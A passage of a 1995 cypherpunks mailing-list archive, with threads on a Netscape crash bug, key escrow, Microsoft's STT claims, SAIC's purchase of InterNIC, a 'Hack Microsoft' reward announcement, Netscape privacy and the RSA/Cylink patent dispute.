In-Reply-To:  <199509260045.OAA12377@hookomo.aloha.net> from "Timothy Newsham"
              at Sep 25, 95 02:45:26 pm

>
> > >On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
> > >fault and subsequent coredump. GDB reports nothing useable (stripped
> > >executable)
> >
> >   I cannot reproduce this bug on the following platforms:
> >
> >         Solaris 2.5 beta/Netscape 1.1N
>
> I've reproduced it fine under sol2.4 1.1N.  The page
> I tested from is http://www.aloha.net/~newsham/test.html.
> Simply click on the long test url and core dump.
> (You can view source before clicking to see what you
> are clicking on if you dont trust me :)
>
> > Howard Owen hbo@octel.com   Octel Communications Corporation  1024/DC671C31 =
>

Ive tried this url, it does indeed core dump.

Just had a quick look at the core.  From first impressions, it's a global
overwrite.  Therefore we're not overwriting a flushed stack frame, so a
syslog(3) style exploit is impossible.

Global overwrites can be exploited, but due to the scenario we're looking
at, I'd consider exploit chances to be very low indeed.

Cheers,

Neil
--
Let the Mystery Be, So Watcha Want, Longing In Their Hearts, Hate My Way,
M-Bike, Safari, Uncle June and Aunt Kiyoti, Daisy Dead Petals, Tuff Gnarl.

     ...like a badger with an afro throwing sparklers at the Pope...


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 28 Sep 95 20:06:05 PDT
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: GSSAPI compliant Apps
In-Reply-To: <Pine.A32.3.91.950928205746.26830B-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <199509290305.XAA25007@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Grab the Kerberos V distribution from MIT; it has a GSSAPI implementation
and a sample client/server that use it.  I believe you can find it on:
	ftp://athena-dist.mit.edu/pub/ATHENA/kerberos

-derek

> I'm interested in writing a GSSAPI compliant app, but I have been so far 
> unsucessful in finding an example of GSSAPI compliant code to use as a 
> baseline.
> 
> Does anyone have any pointers?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frederic Miserey" <frederic@none.net>
Date: Thu, 28 Sep 95 15:41:47 PDT
To: cypherpunks@toad.com
Subject: Re: 25 Crays a Year to Break STT
Message-ID: <9509282340.AA44771@margote.none.net>
MIME-Version: 1.0
Content-Type: text/plain

> to encourage widespread adoption of STT, Microsoft and Visa are making 
> its technical specifications available at no charge to third parties 
> to allow them to develop software. 
>
I can't find any infos on www.microsoft.com. Any hint on how to get these 
specs ?

Frederic


---------------------------------------------------------------------------
Frederic Miserey                                   mailto:frederic@none.com
none programs                                         finger me for PGP key
                           42 3A 75 40 71 E6 DC 3B  50 90 F9 6B 26 28 60 91
 "The last bug isn't fixed until the last user is dead" - Sidney Markowitz


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Sep 95 20:54:50 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
In-Reply-To: <ac90a93404021004b7de@[205.199.118.202]>
Message-ID: <199509290354.XAA21646@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 1:49 AM 9/29/95, Douglas Barnes wrote:
> >[Tim May writes about why crypto h/w acceleration using DSPs,
> >and DSPs in general, are likely doomed niche markets.]
> >
> >I pretty much agree with Tim, except it's important to realize
> >that a for a _server_ that is doing a lot of RSA operations, the
> >difference between a 3.2 second encryption and a 1.9 second
> >encryption is significant.
> 
> I don't disagree with Doug about this. But I don't think there are many
> "server" systems running a lot of RSA at this point.
[...]
> for most of us, the
> amount of RSA (or PGP, IDEA, DES, etc.) computation is a tiny fraction of
> the total computons consumed running screen savers.

And if problems like this don't get solved, how do you expect digital
online banking to be done? Psychic quantum transfers between the
machines? What do you think a bank in the future is, if not a server
that has to do lots and lots of RSA or D-H or what have you?

Sorry for being nasty, Tim. Its just that some of us live in the real
world, have real clients, and actually worry about this as a
problem. This *is* a legitimate problem. Consider what the load on a
web site using D-H key exchange for every connection gets like when
you have millions of people hitting it every day.

> (I recall seeing articles about specialized modular exponentiation hardware
> in 1988, and Cylink was offering several such chips. I've yet to see any
> commercial boards, for reasonable prices. And I'm willing to be that no
> more than 3 members of our list would buy such a board, even if the hooks
> were in place to let PGP, RSAREF, etc. use it. Just a hunch.)

You obviously haven't heard of Fortezza cards. Yup, they are key
escrowed -- but they do in fact do public key operations on
board. There are a lot of them floating around.

The reason the market for this is weird is the same reason Sun took
the DES chips off its motherboards years ago -- you can't conduct
modern business with the fucked up export regime we are dealing with.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Sep 95 23:59:51 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199509290659.XAA09160@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
>director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
>General Max Thurman, commander of the Panama Invasion. Recently departed
>board members include Robert Gates, former CIA director; William Perry,
>current Secretary of Defense; and John Deutch, the current CIA director.
...
>"At the very time the Internet community is struggling with the issues of
>encryption and privacy, I'm more than a little uneasy to find this bunch of
>ex-spooks sitting at the very entry point of the Net," says Jim Warren (a

Yeah, that _is_ a pretty spooky bunch; I don't know if anybody'd have standing
to do a conflict-of-interest or governmental ethics case of any sort,
since it is more or less a monopoly?  
[BEGIN NOISE]
On the other hand, I suppose I'd
rather have the CIA making money by selling directory services than,
say, dealing cocaine or collecting graft from third-world governments :-)
[END NOISE]

>Current SAIC government contracts include re-engineering information systems
>at the Pentagon, automation of the FBI's computerized fingerprint
>identification system, and building a national criminal history information
>system.

SAIC's a fairly generalized contracting firm, specializing in study contracts
and other front-end work rather than back-end implementation grunt-work;
I'm not surprised by the list.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Sep 95 00:00:30 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
Message-ID: <199509290659.XAA09185@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I for one am against any kind of GAK on moral grounds.  I also think
>that trying to implement mandatory GAK in a software only system
>would be a nightmare.

Unfortunately, it's quite simple, if your only intent is to get the keys,
and not to use it as a way to increase NSA leverage...
Carl Ellison's web page points out the simple version of this,
and it's easy to extend to make it more reliable.
1) Have the NSA/NIST/DEA/etc. generate public keys for their GAK agents.
2) Have each session-key-transfer encrypt a copy of the session key with
the public key of the GAK agent, and send it at the beginning of the connection.
3) To make it more robust, have the recipient of the session key also 
encrypt the session key with the GAK key and send it back,
so that a conformist receiver can rat the key even if the sender didn't.
(takes a little protocol support to make sure the sender doesn't mind
getting it echoed back to her.)

Unlike Steven Walker's fancy complex method (which Dorothy liked a lot),
this is simple and straightforward, and requires no validation by
the recipient.  (Both parties could send fakes, but they could
do that anyway.)  What it doesn't do is allow third parties to detect
whether the GAK field has the real session key in it or a fake,
but c'est la guerre.  You can even get fancier and support M-of-N splitting,
requiring M of N GAK agents to give out their keyparts; just do the
split and encrypt each piece with the corresponding GAK agent's public key.
This also works in a wide variety of environments (e.g. Diffie-Hellman).
You could also scrounge a few bits by using the GAK field as an IV if you 
need one.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Thu, 28 Sep 95 20:58:54 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: awards for hacking microsoft
In-Reply-To: <9509282225.AA04018@ch1d157nwk>
Message-ID: <Pine.LNX.3.91.950928233148.1019A-100000@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, Andrew Loewenstern wrote:

> >  What else, Chaum's Digicash.  If you are unwilling to part with
> >  any of your own, perhaps you can collect contributions, or maybe
> >  the Digicash people will pony-up some extra cyberbucks for a good
> >  cause.  After all, they are worth the paper they're printed on.
> >  :-)
> 
> Don't tell that to the people on the ECM mailing list!  People there have  
> been trading cyberbucks for RealMoney.  The last successful trade I saw was  
> 100 cyberbucks for 4 UK pounds...

And to add to the exchange, I'm offering a US$50 [real] discount for any
client of Gateway Communications that deposits $5 [cyber] via my web page. 

The reduction hurts me very little, and the exchange of cyberbucks is fun. 
Isn't that why we do this stuff anyway? 

-abc

      It's time to stand and cry             |  Alan B Clegg
       That Freedom will not live             |  President
         Beyond our willingness to die         |  Gateway Communications
          -Lester Bork                          |  http://www.gateway.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 28 Sep 95 22:02:32 PDT
To: cypherpunks@toad.com
Subject: 53 of the FAX No's. are GOOD!
Message-ID: <199509290502.WAA29977@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

53 of the Fax numbers were good.

About 15 were no good, and the
rest turned in no answers.

I will update this URL tomorrow,
when I can completely check the list;

http://www.c2.org/~carolann/enda001.html

is where the list is at on the WWW.

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGt9S4rpjEWs1wBlAQE5iQP/e74RL+Rmui47LgWT9hk4LNlfISGkHYS2
fdVsut/mbLF/FrRIeETecaSJOOxOBXBr84OYzRLicka+Lm01ciW32pbXYvILftLS
vNs7ppWoIs+C343cd3TOZx0p2Q8QuSZSUSGSYCEk1dwZTl/rd1iHTU3DW2ALZ66P
xOTLPUV8p1Y=
=dJpK
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 00:27:10 PDT
To: nelson@santafe.edu (Nelson Minar)
Subject: Re: your mail
In-Reply-To: <9509290711.AA07934@sfi.santafe.edu>
Message-ID: <199509290722.AAA01028@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	As if the ITAR would allow something like that to be exported?
As if microsoft would actually produce a product which the ITAR
wouldn't allow to export?
	Sounds like PR bullshit. Compared to this Netscape's PR looks
-good-.

	Stay tuned for Hack Microsoft. Community ConneXion gets into
the T-shirt biz. ;-)

> 
> >>Although no encryption system was totally secure, Mr Dent estimated
> >>it would take "25 Cray supercomputers a year" to break the STT codes.
> >Is it just me, or does someone need to be humbled?
> 
> They're certainly calling out for some external evaluation.
> 
> Has anyone read the specs? Care to summarize? I'm curious if the "25
> crays one year" comment is intended to mean anything, or if it's just
> some foolish PR person who doesn't understand what he's talking about.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 01:07:40 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Fax Service
Message-ID: <199509290802.BAA03251@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I see a potential business opportunity for enterprising cypherpunks:

	People have been posting things saying "we should have press
releases". People have been posting useful information regarding fax
numbers of reporters around the country and such. In this I see a
potential low-maintenance business opportunity for some enterprising
cypherpunk with a high-grade fax machine.

	There is no way anyone can make a 'Cypherpunk press release'
because there is no "Cypherpunk Organization". There -are- however,
cypherpunks organizations. Community ConneXion is one, for example,
and others such as COMSEC partners may be considered cypherpunk
organizations.
	Some enterprising cypherpunk may wish to sell the services of
their fax machine so that cypherpunk organizations don't need to
invest the time towards building up a good database of press fax
numbers. For some fee a cypherpunk organization would send only to the
service a press release, and the service would make sure it reaches
all the people in the press who find cypherpunk topics interesting.

	Hell, if no one sets this up before I get my own mass-faxer
setup, I might just do it myself.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@santafe.edu (Nelson Minar)
Date: Fri, 29 Sep 95 00:13:24 PDT
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199509290439.FAA26254@utopia.hacktic.nl>
Message-ID: <9509290711.AA07934@sfi.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


>>Although no encryption system was totally secure, Mr Dent estimated
>>it would take "25 Cray supercomputers a year" to break the STT codes.
>Is it just me, or does someone need to be humbled?

They're certainly calling out for some external evaluation.

Has anyone read the specs? Care to summarize? I'm curious if the "25
crays one year" comment is intended to mean anything, or if it's just
some foolish PR person who doesn't understand what he's talking about.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Mittelhauser <jonm@netscape.com>
Date: Thu, 28 Sep 95 18:39:34 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape and privacy
In-Reply-To: <9509290026.AA08282@toad.com>
Message-ID: <44fin4$rdq@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


csmyth@blaze.cs.jhu.edu (Chris Smyth) wrote:

>I personally oppose the collection of this type of behavioral tracking
>information without my explicit consent, and I would reconsider using
>software which implements the type of tracking Clark mentions above.  Note,
>Clark's reply is ambiguous because it does not indicate if the `schemes'
>have been implemented or deployed at this time.  Some list member associated
>with Netscape may wish to clarify Clark's comments.  
>
>It is true that a user automatically contacts the Netscape Web cite when
>starting the browser if he or she has not reset the default home page.  I
>reset my home page long ago, but I do not know if the Netscape site is still
>contacted anyway.  Nor do I know if Netscape is contacted when I quit the
>browser, or if elapsed usage time is tracked.

The Navigator doesn't make any special connections nor perform any data collection
on the client-side.  In fact, most of the engineers here would quit long before
we would provide information without consent.  That was the reason for removing
the mail address from the HTTP header years ago...it is very easy to track what
the Navigator sends out by simply setting up a proxy/firewall...

Netscape (the company) does attempt to track users through their contacts with
our homepage...Needless to say, this is a common practice.  We track hits, IP
addresses, and attempt to use cookies to determine unique users...We sell advertising
based on estimates of hits/etc...if you never hit our site, you are never counted...
even if you do hit our site, no information (other than IP address) is ever known...

-Jon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 01:46:32 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION TO OFFER REWARD FOR HACKING MICROSOFT
Message-ID: <199509290841.BAA05624@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Contact: Sameer Parekh 510-601-9777 (Pager: 510-321-1014)

COMMUNITY CONNEXION TO OFFER REWARD FOR HACKING MICROSOFT

Sept. 29 1995 - Community ConneXion, an Internet Privacy Provider in
Berkeley, CA, announced today that it will be providing awards to
people who find and publicize security holes in Microsoft
products.

"Microsoft claims to be promoting secure transactions on the net,"
said Sameer Parekh, founder of Community ConneXion, "We will prove
them wrong." Microsoft has been quoted making disparaging comments
about their competitor Netscape's product, Netscape Navigator.

Community ConneXion has also been offering a reward to expose holes in
Netscape's products. "We target widely used programs," said Parekh.
Parekh expects that many bugs and flaws in Microsoft's security
software will be found.

People want to use the Internet to do business. They want to be able
to buy things, manage their finances, and communicate privately from
the comfort of their home computer. Without a secure infrastructure
none of this is possible.

Information about the Hack Microsoft promotion is available from
http://www.c2.org/hackmsoft/.  People who have found security holes
and have written exploits are directed to send mail to
hackmsoft@c2.org.

Community ConneXion is the premier provider of privacy on the
Internet. They provide anonymous email accounts and support the
anonymous remailer infrastructure. Information is available from
http://www.c2.org/ or info@c2.org.

Microsoft is a trademark of Microsoft Corp. Netscape and Netscape
Navigator are trademarks of Netscape Communications Corp. This
promotion is not affiliated with Microsoft or Netscape.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Thu, 28 Sep 95 18:10:21 PDT
To: cypherpunks@toad.com
Subject: Re: Q&A on the RSA/Cylink legal dispute
In-Reply-To: <9508288123.AA812314973@snail.rsa.com>
Message-ID: <199509290110.CAA23301@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


baldwin , Robert W. Baldwin <baldwin@RSA.COM> wrote:

>Q. Why can't RSA and Cylink simply settle their differences?
>
>     A. That's a good question. The fact is that RSA recognizes this
>     litigation is not beneficial to anyone and has offered to settle the
>     dispute by granting Cylink a license to the MIT patent.

Real Answer:  Because they're all a bunch of crooks.  PKP was formed
for the purpose of monopolizing the market and screwing the customers. 
Unfortunately, RSA and Cylink were too busy trying to screw each other
that they forgot what their real mission was.

>     Cylink has consistently overestimated the strength of its legal
>     position and has refused all reasonable offers.

According to the settlement, RSA made only one offer, which Cylink
refused.  (Which was all that RSA was obligated to do.)

>     Cylink now finds itself in the unenviable position of trying
>     to sell its security products without RSA technology - which
>     is the de facto industry standard.  No amount of "spin
>     doctoring" in press releases by Cylink changes that fact.

Maybe not, but it looks like RSA has their own spin doctors working
on it as well.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 28 Sep 95 19:55:06 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape and privacy
In-Reply-To: <9509290026.AA08282@toad.com>
Message-ID: <44fn4k$s4t@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509290026.AA08282@toad.com>, csmyth@blaze.cs.jhu.edu (Chris Smyth) writes:

> It is true that a user automatically contacts the Netscape Web cite when
> starting the browser if he or she has not reset the default home page.  I
> reset my home page long ago, but I do not know if the Netscape site is still
> contacted anyway.  Nor do I know if Netscape is contacted when I quit the
> browser, or if elapsed usage time is tracked.

  We are counting unique installations of netscape.  We have no way
of mapping that information to a user name.  We don't save any
information about you when you contact our web site.  The Navigator
doesn't make connections to our site behind your back.

> The future Clark posits for his corporation depends on people adopting
> Netscape software for a wide variety of tasks. He wants the browser to
> evolve toward being a general multimedia web browser, mail handler,
> newsreader, and collaboration tool.  Such a tool would handle large amounts
> of private and/or proprietary information and the creator of such a tool
> must be extremely sensitive to privacy concerns in my opinion.  Collecting
> and relaying information about usage is potentially a significant violation
> of the privacy users will expect.

  We are very sensitive to privacy concerns.  A bunch of folks now
working here revolted against an effort to track keystrokes and
mouse clicks in Mosaic while they were at NCSA.  One of those
folks was marca himself.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Fri, 29 Sep 95 01:33:10 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: SpokesPunking...
In-Reply-To: <v02120d05ac8de223a2c8@[199.0.65.105]>
Message-ID: <m0syarr-001BivC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> At 3:03 AM 9/26/95, Craig Hubley wrote:
> >"Consensus on cypherpunks seems to be that 40 bit encryption is not viable
> > for commercial applications, and that Netscape seems to have taken less
> > than due care to choose an appropriate random seed for its session keys."
> 
> No offense offered Craig, 'cause I like reading your stuff here, but the
> concensus opinion on cypherpunks is "We don' need no steeenking
> spokespunk!". 

Does this read like spokespunking ?  I kind of read it more like journalism.

Then again, the role of a temporary mouthpiece, if claimed by anyone, will
lead to a series of flame attacks no matter what they say, even if correct
and reasonable.  And we don't need more of those!  So no spokespunking!

How about standardizing on:  "It seems to me that..." and if someone wants
to refer to his impression of what 'other' punks think, then so be it.

>It seems to me that you can say that without any title, and
> the mouthier amongst us will be tapped for quotes as individuals anyway...

As I was today.  Banking technology or some such trade rag.  Stay tuned
for the editor's guaranteed-outrageous misquotes.  I was careful not to
say anything that might be constured as a quasi-official 'punk' position.
I made the point that the hacking of secure systems, when done in the open,
and without intent to grab private information, was a legitimate activity
in the computer security community, which included the cypherpunks as one
of several interested sub-communities.  And that Netscape saw it that way
too, having acknowledged that they had 'learned a lot', etc.  So...

Flame me!
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Fri, 29 Sep 95 01:36:57 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: cypherpunk press releases vs. FAQ
In-Reply-To: <199509262141.OAA24578@netcom8.netcom.com>
Message-ID: <m0syavT-001BiNC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


I favor a FAQ, but only if each individual answer is attributed to a
specific person and others can answer the same question with possibly
a contradictory answer (but may not refer to the others' answer, that
just makes it quoting and flaming).  Perhaps organized as a hypertext.
Everyone has an HTML browser now, right ?
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 28 Sep 95 21:39:53 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509290439.FAA26254@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: 25 Crays a Year to Break STT

>   Although no encryption system was totally secure, Mr Dent
>   estimated it would take "25 Cray supercomputers a year" to
>   break the STT codes.

Is it just me, or does someone need to be humbled?

STTbruter anyone?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 29 Sep 95 02:58:24 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
In-Reply-To: <9509290018.AA08111@toad.com>
Message-ID: <9509290956.AA14949@all.net>
MIME-Version: 1.0
Content-Type: text


> From:  Wes Thomas <wes@ora.com>
> 
> The press recently reported that the National Science Foundation has turned
> over Internet Domain Name registration to Network Solutions, Inc. (NSI) of
> Herndon, VA. The press failed to note some interesting connections.
> 
> Tomorrow morning (Sept. 26), Web Review, a biweekly online magazine (see
> Special Report at http://gnn.com/wr/) will reveal that NSI was purchased in
> May by Scientific Applications International Corporation (SAIC) of San

That's Science Applications ...  An employee owned systems integrator. 
They are one of the largest systems integrators in the world, 2nd largest
to the US government (last time I looked).

> Diego. SAIC is a $2 billion company indicted by the Justice Department on
> ten felony counts for fraud in managing a Superfund toxic cleanup site (SAIC
> pleaded guilty) and sued by the Justice Department for civil fraud on an
> F-15 fighter contract.

Interesting summary, but you forgot to note that what really happened
was that SAIC made some bookkeeping errors, noticed them in a
self-audit, and reported themselves to the government.  Unlike some
companies that try to cover these things up, SAIC found the problems
themselves and didn't cover them up.

> SAIC's board members include Admiral Bobby Inman, former NSA head and deputy
> director of the CIA; Melvin Laird, Nixon's defense secretary; and retired
> General Max Thurman, commander of the Panama Invasion. Recently departed
> board members include Robert Gates, former CIA director; William Perry,
> current Secretary of Defense; and John Deutch, the current CIA director.
> Current SAIC government contracts include re-engineering information systems
> at the Pentagon, automation of the FBI's computerized fingerprint
> identification system, and building a national criminal history information
> system.

SAIC is also one of the largest companies in the information security
field, with over 500 active info-sec contracts at any given time.  They
work for industry as well as government in info-sec, systems
integration, and outsourcing.  For example, they currently do all of the
IT work for BP, handle info-sec for several banks and wall street firms,
have contracts with some of the large players in the entertainment business,
and sponsored the last Americas cup entry from the US.

> "At the very time the Internet community is struggling with the issues of
> encryption and privacy, I'm more than a little uneasy to find this bunch of
> ex-spooks sitting at the very entry point of the Net," says Jim Warren (a
> leading activist in making government records accessible) in the article,
> which was written by investigative journalist Stephen Pizzo, Web Review
> Senior Editor and co-author of the book Inside Job, an expose on the savings
> & loan looting.

The real ex-spooks aren't that heavily embedded in SAIC.  The company
was started by a well known physicist who is still the CEO and chairman,
and they do a lot of research in preserving the environment, undersea
research, business reengineering, and other things that are not spookish.

Just thought I would present the rest of the story.

By the way, I have been a consultant for them from time to time, and I
have found them to be hard working, intelligent, and highly motivated. 
They do indeed have a lot of very intelligent people working for them,
many of whom used to work in high-level positions for both democratic
and republican administrations, but I don't think you should hold that
against them - after all, if you were a major government contractor,
wouldn't you want to get people who know how the government works?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nefud@io.com (Allan Bailey)
Date: Fri, 29 Sep 95 05:57:13 PDT
To: cypherpunks@toad.com
Subject: screensavers and idle computation.
Message-ID: <199509291252.HAA13292@tristero.io.com>
MIME-Version: 1.0
Content-Type: text/plain



  To the folx working on the RC4 et. al. distributed keysearch Net:

Add a module that will be run from things like "xscreensaver".  As Tim May
pointed out, current use of crypto is a "tiny fraction of
the total computons consumed running screen savers".  So let use them, eh?

Besides, it'd be kind of neat seeing the "galaxies in hyperspace" displayed
in a fractal like screensaver image.

--
Allan Bailey                              | "Freedom is not free."  _O_
Senlima Diverseco je Senlimaj Kombinajxoj.| nefud@io.com             |
KC5KSF                                    |
GCS w+ v-/+ C++++ U@$ P+++ L++ E++ N++ po--- Y++ b++
============================================================
= When Privacy Is Outlawed, Only Outlaws Will Have Privacy =
= I Support the Phil Zimmermann Legal Defense Fund!        =
= email: zldf@clark.net   http://www.netresponse.com/zldf  =
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Fri, 29 Sep 95 06:27:18 PDT
To: cypherpunks@toad.com
Subject: FinCen Blurb in local paper
Message-ID: <306bf42f13dd002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Found this in the St Paul Pioneer Press yesterday, no wire service
attribution.

Cyber banking risks cited

New York
Smart Cards, on-line banking and other high-tech consumer 
payment services could be exploited by money launderers 
and other crooks, a Treasury Department official warned
Wednesday. Stanley Morris, director of the Financial Crimes
Enforcement Network, said that government and regulatory
agencies believe the new systems, known as cyber banking,
will profoundly alter financial services in the future.

"The government has got to get its act together" and quickly
decide on whether on-line banking systems and smart cards 
require new regulations," Morris said.

Morris spoke to reporters after a day-long closed-door meeting
of bankers, regulators, law enforcement officials and technology
executives sponsored by FinCen, the governments anti-money
laundering agency.

--- end article ---


-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 29 Sep 95 05:28:46 PDT
To: baldwin@RSA.COM (RobertW.Baldwin) (baldwin)
Subject: Re: Q&A on the RSA/Cylink legal dispute
In-Reply-To: <9508288123.AA812314973@snail.rsa.com>
Message-ID: <9509291227.AA03616@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


IANAL, but after a couple of hours of slogging through the arbitration
report, here's my layman's interpretation:

-	Either both sides or neither side breached the agreement forming PKP
	(the arbitrators went out their way to avoid assigning blame)

-	PKP is dissolved by mutual agreement.

-	Cylink maintains control of the Stanford patents (Hellman-Merkle,
	Diffie-Hellman [others (?)])

-	RSA maintains control of the MIT patents (RSA [others])

-	It isn't clear to me whether Cylink maintained the right to use
	the RSA software in creating a product.  The arbitration order
	was as clear as mud on this point.  It is clearer that they
	maintained the right to *use the patented technology* covered by
	the MIT patents in the creation of a product.  In either case,
	it appears that their right does not extend to the point where
	they can sublicense the technology -- so it looks to me like
	Cylink can't sell you an RSA toolkit, for instance.

-	RSA has no rights to license the Stanford patents.


RSA's FAQ (via baldwin@rsa.com) writes:

>      A. The Panel's ruling was very specific. Everything it said about third 
>      parties, including RSA customers who use software, refers to their need 
>      for patent licenses. If you bought software from RSA and RSA itself had 
>      the rights to make that software and license it to you, you don't need 
>      a separate patent license; rights to the patents came with the product. 
>      The Ruling also states, "RSA has a right to license its software."

This answer is evasive.  RSA didn't give the complete sentence from the
arbitration panel's order.  It is:

